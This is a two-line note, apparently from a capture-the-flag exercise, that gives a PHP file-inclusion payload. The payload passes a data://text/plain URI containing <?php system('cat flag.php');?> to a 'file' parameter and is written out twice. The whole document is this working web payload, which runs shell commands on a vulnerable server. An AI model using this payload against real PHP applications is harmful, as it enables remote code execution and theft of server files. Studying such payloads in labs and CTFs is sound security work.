利用data://text/plain, payload:?file=data://text/plain,<?php system("cat flag.php");?>
?file=data://text/plain,<?php system("cat flag.php");?>